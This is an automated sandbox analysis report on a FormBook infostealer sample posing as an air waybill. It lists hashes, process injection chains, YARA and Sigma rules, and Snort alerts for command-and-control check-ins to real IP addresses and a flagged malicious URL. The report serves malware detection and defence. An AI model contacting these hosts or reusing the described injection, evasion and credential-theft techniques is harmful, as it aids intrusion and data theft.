Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
AWB NO. 077-57676135055.exe

Overview

General Information

Sample name:AWB NO. 077-57676135055.exe
Analysis ID:1467058
MD5:d0aa9dae95ef6311340a157817230bf0
SHA1:80019b077b5c1ded0b6485443100c66e94d92e3a
SHA256:089fa75d9d15b2c8abbaf0daf126b72c8e22dbddb31f56e50f4a19c90065b10f
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected FormBook
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64native
  • AWB NO. 077-57676135055.exe (PID: 7988 cmdline: "C:\Users\user\Desktop\AWB NO. 077-57676135055.exe" MD5: D0AA9DAE95EF6311340A157817230BF0)
    • svchost.exe (PID: 3516 cmdline: "C:\Users\user\Desktop\AWB NO. 077-57676135055.exe" MD5: B7C999040D80E5BF87886D70D992C51E)
      • jFlHFdZgIYNZqR.exe (PID: 4468 cmdline: "C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • RpcPing.exe (PID: 2268 cmdline: "C:\Windows\SysWOW64\RpcPing.exe" MD5: F7DD5764D96A988F0CF9DD4813751473)
          • jFlHFdZgIYNZqR.exe (PID: 7100 cmdline: "C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 1088 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: FA9F4FC5D7ECAB5A20BF7A9D1251C851)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.18533462079.0000000002D90000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000002.00000002.18533462079.0000000002D90000.00000040.10000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2b9c0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x1442f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000004.00000002.23184804964.0000000002AE0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000004.00000002.23184804964.0000000002AE0000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2b9c0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x1442f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000002.00000002.18532632938.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 9 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        2.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          2.2.svchost.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2e133:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x16ba2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          2.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            2.2.svchost.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2ef33:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x179a2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Uncommon Svchost Parent Process
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\AWB NO. 077-57676135055.exe", CommandLine: "C:\Users\user\Desktop\AWB NO. 077-57676135055.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\AWB NO. 077-57676135055.exe", ParentImage: C:\Users\user\Desktop\AWB NO. 077-57676135055.exe, ParentProcessId: 7988, ParentProcessName: AWB NO. 077-57676135055.exe, ProcessCommandLine: "C:\Users\user\Desktop\AWB NO. 077-57676135055.exe", ProcessId: 3516, ProcessName: svchost.exe
            Sigma detected: Windows Processes Suspicious Parent Directory
            Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\AWB NO. 077-57676135055.exe", CommandLine: "C:\Users\user\Desktop\AWB NO. 077-57676135055.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\AWB NO. 077-57676135055.exe", ParentImage: C:\Users\user\Desktop\AWB NO. 077-57676135055.exe, ParentProcessId: 7988, ParentProcessName: AWB NO. 077-57676135055.exe, ProcessCommandLine: "C:\Users\user\Desktop\AWB NO. 077-57676135055.exe", ProcessId: 3516, ProcessName: svchost.exe

            Snort Signatures

            Timestamp:07/03/24-17:38:41.597037
            SID:2855464
            Source Port:49807
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/03/24-17:35:53.379726
            SID:2855465
            Source Port:49785
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/03/24-17:38:49.790857
            SID:2855465
            Source Port:49810
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/03/24-17:39:03.353831
            SID:2855465
            Source Port:49814
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/03/24-17:41:04.604431
            SID:2855464
            Source Port:49820
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/03/24-17:41:04.604431
            SID:2856318
            Source Port:49820
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/03/24-17:38:55.322060
            SID:2855464
            Source Port:49811
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/03/24-17:35:19.814648
            SID:2855464
            Source Port:49775
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/03/24-17:38:30.629728
            SID:2855464
            Source Port:49804
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/03/24-17:37:44.983410
            SID:2855464
            Source Port:49791
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/03/24-17:41:56.990093
            SID:2855464
            Source Port:49834
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/03/24-17:37:52.995920
            SID:2855465
            Source Port:49794
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/03/24-17:38:01.880492
            SID:2855464
            Source Port:49796
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/03/24-17:39:20.021413
            SID:2855464
            Source Port:49816
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/03/24-17:34:51.075295
            SID:2855465
            Source Port:49773
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/03/24-17:41:49.018292
            SID:2855465
            Source Port:49832
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/03/24-17:35:48.040883
            SID:2855464
            Source Port:49783
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/03/24-17:41:59.662463
            SID:2855464
            Source Port:49835
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/03/24-17:38:58.004159
            SID:2855464
            Source Port:49812
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/03/24-17:37:31.398547
            SID:2855464
            Source Port:49787
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/03/24-17:37:58.967654
            SID:2855464
            Source Port:49795
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/03/24-17:41:46.335352
            SID:2855464
            Source Port:49831
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/03/24-17:38:22.262574
            SID:2855465
            Source Port:49802
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/03/24-17:41:12.622332
            SID:2855465
            Source Port:49823
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/03/24-17:38:35.975142
            SID:2855465
            Source Port:49806
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/03/24-17:41:26.425379
            SID:2855464
            Source Port:49825
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/03/24-17:35:25.248405
            SID:2855465
            Source Port:49777
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/03/24-17:35:45.371922
            SID:2855464
            Source Port:49782
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/03/24-17:39:17.207076
            SID:2855464
            Source Port:49815
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/03/24-17:39:25.651052
            SID:2855465
            Source Port:49818
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/03/24-17:38:14.032249
            SID:2855464
            Source Port:49799
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/03/24-17:42:02.330769
            SID:2855465
            Source Port:49836
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/03/24-17:38:07.702914
            SID:2855465
            Source Port:49798
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/03/24-17:41:21.068289
            SID:2855465
            Source Port:49824
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/03/24-17:41:43.646684
            SID:2855464
            Source Port:49830
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/03/24-17:38:16.781913
            SID:2855464
            Source Port:49800
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/03/24-17:38:44.325926
            SID:2855464
            Source Port:49808
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/03/24-17:41:29.155995
            SID:2855464
            Source Port:49826
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/03/24-17:41:40.953569
            SID:2855464
            Source Port:49829
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/03/24-17:37:34.078991
            SID:2855464
            Source Port:49788
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/03/24-17:35:31.783314
            SID:2855464
            Source Port:49778
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/03/24-17:41:34.589608
            SID:2855465
            Source Port:49828
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/03/24-17:35:39.849238
            SID:2855465
            Source Port:49781
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/03/24-17:41:07.282335
            SID:2855464
            Source Port:49821
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/03/24-17:35:50.712765
            SID:2855464
            Source Port:49784
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/03/24-17:35:17.093039
            SID:2856318
            Source Port:49774
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/03/24-17:35:34.479335
            SID:2855464
            Source Port:49779
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/03/24-17:38:27.957124
            SID:2855464
            Source Port:49803
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/03/24-17:35:17.093039
            SID:2855464
            Source Port:49774
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/03/24-17:37:47.657326
            SID:2855464
            Source Port:49792
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/03/24-17:41:54.322753
            SID:2855464
            Source Port:49833
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/03/24-17:37:39.419517
            SID:2855465
            Source Port:49790
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus detection for URL or domain
            Source: http://www.lakemontbellevue.com/bjbg/Avira URL Cloud: Label: malware
            Multi AV Scanner detection for submitted file
            Source: AWB NO. 077-57676135055.exeReversingLabs: Detection: 47%
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000002.00000002.18533462079.0000000002D90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.23184804964.0000000002AE0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.18532632938.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.23186298424.00000000050F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.23186502535.0000000003120000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.23186224923.0000000002F40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.18534395996.0000000005E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Machine Learning detection for sample
            Source: AWB NO. 077-57676135055.exeJoe Sandbox ML: detected
            Source: AWB NO. 077-57676135055.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: jFlHFdZgIYNZqR.exe, 00000003.00000000.18449708265.000000000051E000.00000002.00000001.01000000.00000004.sdmp, jFlHFdZgIYNZqR.exe, 00000005.00000002.23184750264.000000000051E000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: wntdll.pdbUGP source: AWB NO. 077-57676135055.exe, 00000000.00000003.18131573643.0000000003FB0000.00000004.00001000.00020000.00000000.sdmp, AWB NO. 077-57676135055.exe, 00000000.00000003.18129996314.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.18533534284.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.18369078674.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.18533534284.000000000302D000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.18362303524.0000000000A00000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000004.00000002.23186772776.000000000343D000.00000040.00001000.00020000.00000000.sdmp, RpcPing.exe, 00000004.00000002.23186772776.0000000003310000.00000040.00001000.00020000.00000000.sdmp, RpcPing.exe, 00000004.00000003.18532753430.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000004.00000003.18540137751.0000000003163000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: RPCPing.pdbGCTL source: svchost.exe, 00000002.00000003.18500957971.000000000081A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.18501031361.000000000082B000.00000004.00000020.00020000.00000000.sdmp, jFlHFdZgIYNZqR.exe, 00000003.00000003.22066027832.0000000000B9B000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: AWB NO. 077-57676135055.exe, 00000000.00000003.18131573643.0000000003FB0000.00000004.00001000.00020000.00000000.sdmp, AWB NO. 077-57676135055.exe, 00000000.00000003.18129996314.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.18533534284.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.18369078674.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.18533534284.000000000302D000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.18362303524.0000000000A00000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000004.00000002.23186772776.000000000343D000.00000040.00001000.00020000.00000000.sdmp, RpcPing.exe, 00000004.00000002.23186772776.0000000003310000.00000040.00001000.00020000.00000000.sdmp, RpcPing.exe, 00000004.00000003.18532753430.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000004.00000003.18540137751.0000000003163000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: RPCPing.pdb source: svchost.exe, 00000002.00000003.18500957971.000000000081A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.18501031361.000000000082B000.00000004.00000020.00020000.00000000.sdmp, jFlHFdZgIYNZqR.exe, 00000003.00000003.22066027832.0000000000B9B000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: RpcPing.exe, 00000004.00000002.23187811443.000000000393C000.00000004.10000000.00040000.00000000.sdmp, RpcPing.exe, 00000004.00000002.23185093416.0000000002DD2000.00000004.00000020.00020000.00000000.sdmp, jFlHFdZgIYNZqR.exe, 00000005.00000000.18680544916.0000000002D7C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000006.00000002.19004125183.000000003A15C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: RpcPing.exe, 00000004.00000002.23187811443.000000000393C000.00000004.10000000.00040000.00000000.sdmp, RpcPing.exe, 00000004.00000002.23185093416.0000000002DD2000.00000004.00000020.00020000.00000000.sdmp, jFlHFdZgIYNZqR.exe, 00000005.00000000.18680544916.0000000002D7C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000006.00000002.19004125183.000000003A15C000.00000004.80000000.00040000.00000000.sdmp
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exeCode function: 0_2_00464696 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00464696
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exeCode function: 0_2_0046C93C FindFirstFileW,FindClose,0_2_0046C93C
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exeCode function: 0_2_0046C9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,0_2_0046C9C7
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exeCode function: 0_2_0046F200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0046F200
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exeCode function: 0_2_0046F35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0046F35D
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exeCode function: 0_2_0046F65E FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_0046F65E
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exeCode function: 0_2_00463A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00463A2B
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exeCode function: 0_2_00463D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00463D4E
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exeCode function: 0_2_0046BF27 FindFirstFileW,FindNextFileW,FindClose,0_2_0046BF27

            Networking

            barindex
            Snort IDS alert for network traffic
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.20:49773 -> 74.208.236.38:80
            Source: TrafficSnort IDS: 2856318 ETPRO TROJAN FormBook CnC Checkin (POST) M4 192.168.11.20:49774 -> 142.202.6.230:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49774 -> 142.202.6.230:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49775 -> 142.202.6.230:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.20:49777 -> 142.202.6.230:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49778 -> 74.208.236.230:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49779 -> 74.208.236.230:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.20:49781 -> 74.208.236.230:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49782 -> 199.59.243.226:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49783 -> 199.59.243.226:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49784 -> 199.59.243.226:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.20:49785 -> 199.59.243.226:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49787 -> 3.33.130.190:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49788 -> 3.33.130.190:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.20:49790 -> 3.33.130.190:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49791 -> 66.235.200.145:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49792 -> 66.235.200.145:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.20:49794 -> 66.235.200.145:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49795 -> 103.120.176.124:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49796 -> 103.120.176.124:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.20:49798 -> 103.120.176.124:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49799 -> 203.161.50.127:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49800 -> 203.161.50.127:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.20:49802 -> 203.161.50.127:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49803 -> 172.67.146.224:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49804 -> 172.67.146.224:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.20:49806 -> 172.67.146.224:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49807 -> 44.227.65.245:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49808 -> 44.227.65.245:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.20:49810 -> 44.227.65.245:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49811 -> 3.33.130.190:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49812 -> 3.33.130.190:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.20:49814 -> 3.33.130.190:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49815 -> 84.32.84.192:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49816 -> 84.32.84.192:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.20:49818 -> 84.32.84.192:80
            Source: TrafficSnort IDS: 2856318 ETPRO TROJAN FormBook CnC Checkin (POST) M4 192.168.11.20:49820 -> 3.33.130.190:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49820 -> 3.33.130.190:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49821 -> 3.33.130.190:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.20:49823 -> 3.33.130.190:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.20:49824 -> 74.208.236.38:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49825 -> 142.202.6.230:80
